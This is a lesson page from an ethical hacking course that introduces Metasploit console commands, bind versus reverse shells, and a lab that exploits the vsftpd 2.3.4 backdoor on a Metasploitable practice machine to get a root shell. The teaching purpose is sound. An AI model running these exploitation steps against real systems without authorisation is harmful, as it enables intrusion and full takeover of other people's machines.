Week 5: Exploitation Basics

Path: Ethical Hacking | Module: 5 of 8

Breaking In

Exploitation is the act of using a vulnerability to gain unintended access or control. This is the "Hacking" part.

1. The Metasploit Framework

A massive database of exploit code. It makes launching attacks simple.

  • msfconsole: The main interface.
  • search [term]: Find an exploit.
  • use [exploit]: Select it.
  • set RHOSTS [target]: Aim the weapon.
  • run: Fire.

2. Shells

When you exploit a system, you usually want a "Shell" (command line access).

  • Bind Shell: The victim opens a port, you connect to it. (Blocked by firewalls).
  • Reverse Shell: The victim connects back to you. (Bypasses most firewalls).

🔬 Lab Exercise: Vsftpd Backdoor

Objective: Get a shell.

  1. In Kali, run msfconsole.
  2. Search for the vsftpd backdoor: search vsftpd_234.
  3. Use it: use 0.
  4. Set target: set RHOSTS [Metasploitable IP].
  5. Run it.
  6. If successful, you will see Command shell session 1 opened. Type whoami. You are root!
← Previous Week Next: Web Application Security →